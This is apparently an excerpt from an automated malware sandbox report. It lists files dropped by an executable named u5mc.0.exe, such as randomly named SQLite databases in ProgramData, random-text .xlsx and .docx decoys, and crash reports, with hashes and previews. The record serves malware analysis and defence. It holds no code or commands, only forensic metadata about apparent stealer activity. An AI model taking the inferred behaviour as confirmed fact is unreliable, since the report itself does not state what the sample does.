SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CBKJEGCB

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5mc.0.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DBAEHCGHIIIDHIECFHJD

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5mc.0.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DQOFHVHTMG.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5mc.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.702862417860716
Encrypted:	false
SSDEEP:	24:JCmIDeBF63lGj/+QvH8n8JCl7odrVgKqBP68iz:4QQQvHFrTqBPXiz
MD5:	CC0686FCDF6617729D1EDF30F49501F1
SHA1:	02D629848E3D467D8143B057F003E0D7448126CD
SHA-256:	31E15305BC0579F03C51A1D6534B332F32C73ABC6D1B68BA0BDA6FCF97F593C9
SHA-512:	8BD18EB486BA6D2799329D9A8EFB3F52C3D109F5CB070290418DDE4B58756CD023857E4CAE62323C530FA0D3A60372C97D9744C1911A688D3592EABD14005F25
Malicious:	false
Preview:	DQOFHVHTMGONGZJMTUDJRBBZMRPVREMYHKGEHFUQYXZCSKHYXSDQYNTHYMAXXVSVAUOGMFIYPDCQLTHSECIYLWTRIBFEAYHUXINIFQBTJDZMINEEJPQYKGEESHWZILKBYECTPQSECVJBFSZOCCSNOVPIAHSFZWVXPNEQGUOXWPBXJRUYFARJLNHPVXAJZAMAADRKIWNDXYEBYMEBSXOJGEOURNOIBBLONDSVHAOQHPMGXZYJJTGITBJPQEBNXGZYUKARGBCVCJUHSRNNEVOIGUVCJVMNFBKNVZYQADNKMLUVPOTXVOQFRBXUSSRFMQEZCJFQXKCGKGKCVGGVBKNPTNSSMADFJLSDMVXHSOETKCENTGLOVOHUYJFTIWFHKFJRYNOXVIGPLHNBFPFOCWMNOQXWIPYAHPKRVTBFYKRBDVDUAZBSLWPPMXJXDVRCRPKOGCUKNZKBLJGIGZASUAZBLZBMGJSBNQSVTMGEWGLMNJKCSBEAGDUINAXDWMHJASNQRRDMKVXOKATATHRLEOJRPCUOAVQIESHZYWIQCSCAPIAJHBTEIYVRFEDCQDCDIYPMQVBWUEHDPIDAGKYZBMLBDUTEIFYLBSHAWEMNTPQDCSTOWSBZWQEBLVBNUWKZFUDMPBKETDOEOIXRFTDUFIBPBSUHXQTCPRPZAKDTRWMGSAVOZBNDDMDIHBSGIPOMYLKSGKUWRGKNXSOLUZDUZYQFQTKMNWLSYKVAQVIHJTFYNRTERQMIRVMLNWEIMHPIWEWIZJJRGOCBVHFGCSCPAIQYTEMYIQJKVUFAZERTMPUQSRHOZHOYABIALCSKDKHEDHJGKBYVCDZGPYPCLDCEFHWFMLSBOUUGKJFXSVKJVYVTSMIZISSWNRRWBNOMXZCOJAULXRXTNHTYWTZNFOKXVGZMTRVOSMSRMYBHKSHRCPZSSMDBJOTQQRGYIHEMZHHSWECVAOPVNLGBYHZVZPLQHOTCJNPUXICWZBLKAQFGUZPW

C:\ProgramData\DTBZGIOOSO.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5mc.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.705615236042988
Encrypted:	false
SSDEEP:	24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
MD5:	159C7BA9D193731A3AAE589183A63B3F
SHA1:	81FDFC9C96C5B4F9C7730127B166B778092F114A
SHA-256:	1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
SHA-512:	2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
Malicious:	false
Preview:	DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP

C:\ProgramData\DVWHKMNFNN.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5mc.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\ProgramData\EGIJKEHC

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5mc.0.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HCGCBFHCFCFBFIEBGHJECGHCFI

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5mc.0.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HJDBFBKKJDHJKECBGDAKJEGCGH

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5mc.0.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JDDHMPCDUJ.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5mc.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687055908915499
Encrypted:	false
SSDEEP:	24:X3rfasg2Tpd/zBJY+q9FZP0DJR6BdqWD5gB8H36D6jXLiUk2ZTV:X+52L/dJYBjYJRoddD5C8HqD8ZDZTV
MD5:	94EDB575C55407C555A3F710DF2A8CB3
SHA1:	3AB8DF4B92C320D7D4C661EAB608E24B43F3DD13
SHA-256:	DD3A4A93D60E4B7840557A44DAAF77F6B6F85032C7DD5FB10BE54C07B0E1E261
SHA-512:	F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
Malicious:	false
Preview:	JDDHMPCDUJFORBKGTIFQHFPQNEKFAIHGBDYZBWNZMVTSZXTGRUOCZPQRXMGXBNMAHGODCTVNAHQHZMJYIYXLTVDMEAVEXSWFQCDVPRSSLREITYMWHUXVVKLPJXQJOHYPAVYXSIMBBOTIWYDKNCDVKZZMEIFEDNNXHAHMYLPOUGNKMPZVDEQRUPZBQCKZDQINFECCUZINROAFGLIAMVWHXPPXOWZMWTITWBJFIENEHRXRHRPVUAIUAJUYDBBSQQMTJJXOAAMHVKJEOIQRSNKKQSGCHAUKUYPJEBZIGZTVKUXZEQOUSZPQBHKFHECDNFGTGIDHSJFVLAKZPDYVJVWECRIKKUCCFNNHBLBFCJEKSUZTITTTLQVOHKFHXFIIYDOZNAIBCDIRXJAYKHCOEXBOGSGEGGQEMHFXIZREOFZJSAFXTGSSZLVKYOANMZNPNESDZMFYWTZHIKUSMZXACWZEIMGTFRSZCGICPOSTZRECQYWZECQVLAWXESWPCDXLHIMJHSZJSDAXNXHETAWLZDXTZAPKBHSMKMYYGVSJCUIJSIFUHHMPIRBASPUOUXKKPQCECQBBZUSIXEOXLFFSQIFCTAIRASCMWEHFOXGEJRXFGJODUTKITHEAKFFJQTQNWWKXXDELWDHHEDWUTMSLXQJPVGOBKELYSRBQFYKXFHWGSCVLTCFKOEJMLUXIZVDPFHXHTSMTDRTVCNLISGJFVQRUTMZDYPUYBAEASZCSEUVHWRIQDEJIZQQHJNTIIICFMMPVLXOIVTPCTDKFPDVWXSBXZDXFUMBJTJMKOOHIMIOAKEJSIDIOJSRMRYXLDVGDBBYXARBNHXOXMBXYOTEFOAXRAUKXTWKYYGWNAHHCIIKQHYAETGBWABTEMJKNTEUQAWGHRIKDGGNHUIVVPPYPYTZERZKDPLUSIKPBDPJOCBYQJDEKAVQKHFTPBZJQOUCVBHAHZZGEXOCYGYDCZICBOETRSJSMVEZKINDRIKZYTUIS

C:\ProgramData\KATAXZVCPS.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5mc.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\ProgramData\LTKMYBSEYZ.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5mc.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687722658485212
Encrypted:	false
SSDEEP:	24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:	9A59DF7A478E34FB1DD60514E5C85366
SHA1:	DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:	582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:	70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:	false
Preview:	LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_QPoX60yhZt.exe_3b936bee356921bdf0108d87e67df5bf8fe2597_7538cbfb_09039235-f44a-457f-baf2-d0274dc9ff21\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0829570998057394
Encrypted:	false
SSDEEP:	192:K5fXieisd038CHiboTjsqxuugCzuiFCZ24IO8v:feiseMCHiMTjYCzuiFCY4IO8v
MD5:	D5C56E096B46353021D00E47D73B01A6
SHA1:	6BC70FEB1D7E6962911C719A0080E36C2629AF2E
SHA-256:	D4DC4848365404F05A1C7A40250B85D9DA0DDED536FADD0744905737ADF59D4C
SHA-512:	CFC3A1B7EFF3DBC52759BBF33DC0F3CE2D5882C5E9B41FBB1076D5E084AD871255AD7DCEC6EAD4EE3F29D9F076FDA97B396784F2998D54CAAA767B10BC19E87A
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.5.9.3.6.3.3.8.5.3.5.2.0.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.5.9.3.6.3.4.3.5.3.5.2.0.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.9.0.3.9.2.3.5.-.f.4.4.a.-.4.5.7.f.-.b.a.f.2.-.d.0.2.7.4.d.c.9.f.f.2.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.0.6.f.7.6.3.a.-.e.f.4.1.-.4.0.6.c.-.9.3.8.0.-.2.2.f.6.3.a.6.b.f.3.9.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.Q.P.o.X.6.0.y.h.Z.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.7.4.-.0.0.0.1.-.0.0.1.4.-.c.6.c.2.-.d.7.7.e.b.3.9.7.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.a.e.f.e.a.4.c.8.6.d.4.d.9.2.1.5.7.7.d.d.c.d.0.c.1.a.9.1.c.8.9.0.0.0.0.f.f.f.f.!.0.0.0.0.8.8.c.f.7.e.a.f.5.d.b.9.a.6.2.5.a.4.f.d.9.2.2.a.f.e.4.c.8.5.1.a.b.d.d.8.6.b.0.b.!.Q.P.o.X.6.0.y.h.Z.t...e.x.e.....T.a.r.g.e.t.A.p.p.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_u5mc.0.exe_913bb38c7620c34429ee22e7b0d6d5287a24588_6c3f02b4_93ec0ccd-db4a-4426-aa30-c0a60352b272\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.14168712903994
Encrypted:	false
SSDEEP:	192:OoJAbFz0VlUACjsqZrP2HVHmzuiFCZ24IO8NI:XJAbFgV2ACjlyGzuiFCY4IO8N
MD5:	CE4A7D6754D516F1C21E3C981074267F
SHA1:	B120C10D1EE08D83B59848B2110AA9C6F33FC5DC
SHA-256:	EFA2154BC472EDA251A7476D10457D258BC78FE3BDC8B91FF502464A98B5C3D7
SHA-512:	95D29408C132DA93E3DCE148A8546D0420D6F07ED7A91C934B57444B99DF2D0600AB96192BEB2473233020AC35F138D882A52257E332CB7750D754567BCD3E4D
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.5.9.3.6.6.0.7.7.5.3.6.4.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.5.9.3.6.6.1.4.9.4.1.1.3.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.3.e.c.0.c.c.d.-.d.b.4.a.-.4.4.2.6.-.a.a.3.0.-.c.0.a.6.0.3.5.2.b.2.7.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.6.f.c.5.4.c.6.-.2.e.3.9.-.4.d.6.7.-.a.d.8.c.-.3.7.4.a.3.2.1.0.e.a.3.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.u.5.m.c...0...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.c.4.-.0.0.0.1.-.0.0.1.4.-.f.b.3.d.-.e.e.8.1.b.3.9.7.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.6.d.8.d.8.5.c.6.e.3.8.1.0.b.2.d.0.4.5.e.a.7.e.5.3.4.7.c.5.8.2.0.0.0.0.f.f.f.f.!.0.0.0.0.b.5.4.5.f.f.c.0.a.c.4.5.4.6.9.a.a.8.4.1.4.6.3.a.4.f.c.1.8.4.9.3.6.1.1.1.e.2.e.8.!.u.5.m.c...0...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1938.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Apr 26 08:27:14 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	51006
Entropy (8bit):	2.841410904119603
Encrypted:	false
SSDEEP:	384:dQMzYSPp0K1Jix7MGeE1aTP/nbE8Ee5Ce3ryUN0i9Sua:ms3aK1Jix7MFE1aTnbT5N9Nlkua
MD5:	A10ECF0D965E51D01860123B41199C5D
SHA1:	B225A50B4669863EBB7A299F622C61C5C45F6640
SHA-256:	F235676D2B144350C9B356100EE85B48F59CAC93F7E6408925A69E35954EFB07
SHA-512:	96A9D35994BFC141DF73528AE89E5D3859725B9BAC45B14ACB90659EC7309B093CFE5B58F11DAD06C487736532356B8A07A175A54E10FB312DE90A0798D07A67
Malicious:	false
